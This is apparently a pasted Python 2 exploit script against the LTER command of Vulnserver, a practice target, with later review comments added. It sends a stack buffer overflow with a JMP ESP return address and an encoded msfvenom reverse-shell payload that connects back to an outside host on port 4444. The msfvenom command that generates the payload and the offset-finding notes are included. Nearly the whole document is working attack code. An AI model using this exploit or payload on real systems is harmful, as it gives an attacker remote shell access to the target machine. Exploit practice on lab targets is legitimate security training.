
LTER

a guest
Nov 16th, 2019
#!/usr/bin/env python
# Python 2 script: it uses print statements and concatenates the str
# `buffer` with the result of struct.pack, so it will not run unmodified
# under Python 3 (SyntaxError on print, TypeError on str + bytes).

import socket
import struct
import sys

# Target taken from the command line (no argument-count check: a missing
# argument raises IndexError, a non-numeric port raises ValueError, both
# before the try block at the bottom).
host = sys.argv[1]
port = int(sys.argv[2])

# 62501203 in essfunc.dll

# The address above packed as a 4-byte little-endian value; it is placed at
# offset 2003 of the buffer below, which the notes further down record as the
# offset where EIP was overwritten.
jmp_esp = struct.pack("<I", 0x62501203)

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.16 LPORT=4444 --arch x86 --platform windows bufferregister=esp -e x86/alpha_upper -f c
# x86/alpha_upper chosen with final size 702

# Encoder output copied verbatim from the command noted above; the author's
# note below ("\x00 & Uppercase Only") presumably records the byte
# restriction that motivated the alpha_upper encoder -- confirm.
shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
"\x4c\x4b\x58\x4c\x42\x35\x50\x43\x30\x35\x50\x43\x50\x4d\x59"
"\x4a\x45\x36\x51\x4f\x30\x52\x44\x4c\x4b\x30\x50\x46\x50\x4c"
"\x4b\x50\x52\x44\x4c\x4c\x4b\x30\x52\x32\x34\x4c\x4b\x32\x52"
"\x46\x48\x34\x4f\x48\x37\x31\x5a\x46\x46\x50\x31\x4b\x4f\x4e"
"\x4c\x57\x4c\x55\x31\x53\x4c\x55\x52\x36\x4c\x37\x50\x4f\x31"
"\x48\x4f\x44\x4d\x55\x51\x48\x47\x4d\x32\x4c\x32\x30\x52\x36"
"\x37\x4c\x4b\x46\x32\x42\x30\x4c\x4b\x31\x5a\x57\x4c\x4c\x4b"
"\x30\x4c\x44\x51\x53\x48\x5a\x43\x57\x38\x53\x31\x38\x51\x56"
"\x31\x4c\x4b\x31\x49\x47\x50\x45\x51\x4e\x33\x4c\x4b\x50\x49"
"\x32\x38\x4a\x43\x36\x5a\x57\x39\x4c\x4b\x37\x44\x4c\x4b\x35"
"\x51\x4e\x36\x46\x51\x4b\x4f\x4e\x4c\x59\x51\x38\x4f\x44\x4d"
"\x53\x31\x39\x57\x56\x58\x4b\x50\x34\x35\x4c\x36\x35\x53\x43"
"\x4d\x5a\x58\x57\x4b\x33\x4d\x37\x54\x42\x55\x4b\x54\x50\x58"
"\x4c\x4b\x30\x58\x31\x34\x45\x51\x59\x43\x35\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x30\x58\x45\x4c\x33\x31\x58\x53\x4c\x4b"
"\x55\x54\x4c\x4b\x43\x31\x58\x50\x4c\x49\x57\x34\x36\x44\x51"
"\x34\x31\x4b\x51\x4b\x35\x31\x31\x49\x51\x4a\x30\x51\x4b\x4f"
"\x4d\x30\x51\x4f\x31\x4f\x50\x5a\x4c\x4b\x45\x42\x4a\x4b\x4c"
"\x4d\x51\x4d\x45\x38\x47\x43\x37\x42\x35\x50\x45\x50\x53\x58"
"\x44\x37\x53\x43\x36\x52\x31\x4f\x36\x34\x45\x38\x50\x4c\x44"
"\x37\x36\x46\x53\x37\x4b\x4f\x38\x55\x58\x38\x4a\x30\x53\x31"
"\x35\x50\x35\x50\x36\x49\x4f\x34\x50\x54\x36\x30\x53\x58\x56"
"\x49\x4b\x30\x42\x4b\x45\x50\x4b\x4f\x48\x55\x56\x30\x56\x30"
"\x50\x50\x50\x50\x47\x30\x56\x30\x51\x50\x56\x30\x35\x38\x4b"
"\x5a\x54\x4f\x49\x4f\x4b\x50\x4b\x4f\x49\x45\x5a\x37\x53\x5a"
"\x33\x35\x33\x58\x54\x4a\x35\x5a\x54\x4a\x34\x50\x32\x48\x55"
"\x52\x33\x30\x44\x51\x31\x4c\x4c\x49\x4d\x36\x42\x4a\x54\x50"
"\x36\x36\x46\x37\x53\x58\x4c\x59\x4e\x45\x52\x54\x43\x51\x4b"
"\x4f\x48\x55\x4d\x55\x59\x50\x54\x34\x44\x4c\x4b\x4f\x50\x4e"
"\x44\x48\x43\x45\x4a\x4c\x35\x38\x4a\x50\x48\x35\x49\x32\x30"
"\x56\x4b\x4f\x59\x45\x55\x38\x52\x43\x42\x4d\x53\x54\x43\x30"
"\x4b\x39\x4b\x53\x36\x37\x36\x37\x50\x57\x46\x51\x5a\x56\x42"
"\x4a\x52\x32\x30\x59\x46\x36\x5a\x42\x4b\x4d\x33\x56\x39\x57"
"\x31\x54\x46\x44\x37\x4c\x35\x51\x55\x51\x4c\x4d\x57\x34\x31"
"\x34\x54\x50\x58\x46\x43\x30\x57\x34\x50\x54\x46\x30\x36\x36"
"\x56\x36\x36\x36\x37\x36\x50\x56\x30\x4e\x51\x46\x46\x36\x36"
"\x33\x31\x46\x53\x58\x42\x59\x48\x4c\x47\x4f\x4b\x36\x4b\x4f"
"\x38\x55\x4b\x39\x4d\x30\x50\x4e\x51\x46\x30\x46\x4b\x4f\x50"
"\x30\x53\x58\x34\x48\x4b\x37\x55\x4d\x43\x50\x4b\x4f\x4e\x35"
"\x4f\x4b\x4a\x50\x4f\x45\x4e\x42\x50\x56\x33\x58\x39\x36\x4d"
"\x45\x4f\x4d\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x54\x46\x33\x4c"
"\x35\x5a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x51"
"\x57\x55\x43\x43\x42\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f"
"\x49\x45\x41\x41")

# Overflowed with lter.spk "LTER /.:/(3520 A's)"
# Message=    EIP contains normal pattern : 0x386f4337 (offset 2003)
# \x00 & Uppercase Only

# NOTE(review): dead code -- `nopsled` is never appended to `buffer` below.
nopsled = "\x43\x4B"*8

# Buffer layout after the "LTER /.:/" prefix: 2003 filler bytes up to the
# EIP offset recorded above, the 4 packed address bytes, the encoded
# payload, then "C" filler so the part after the prefix totals 3516 bytes
# (807 bytes of "C" with the 702-byte payload the comment states).
# NOTE(review): the crash note above says 3520 A's while the padding here
# targets 3516 -- the two figures disagree; confirm which is intended.
# If the payload ever exceeded 3516-2003-4 bytes the repeat count would go
# negative and the "C" filler would silently become empty.
buffer = "LTER /.:/"
buffer += "A"*2003
buffer += jmp_esp
buffer += shellcode
buffer += "C"*(3516-2003-len(jmp_esp)-len(shellcode))

# root@kali:~/vulnserver/TRUN# msf-pattern_offset -q 386F4337
# [*] Exact match at offset 2003
# root@kali:~/vulnserver/TRUN# msf-pattern_offset -q 43396F43
# [*] Exact match at offset 2007

# Connect, read and discard the server banner, send the buffer once, close.
# NOTE(review): the bare `except:` swallows every exception (including
# KeyboardInterrupt) and hides the real cause; `s.close()` is not in a
# `finally`, so the socket is left open on any failure after connect(); and
# `s.send` may transmit fewer bytes than len(buffer) -- its return value is
# not checked (sendall would be the usual choice for a one-shot write).
try:
    print "[+] Connecting to target"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.recv(1024)
    print "[+] Sent payload with length: %d" % len(buffer)
    s.send(buffer)
    s.close()
except:
    print "[-] Something went wrong :("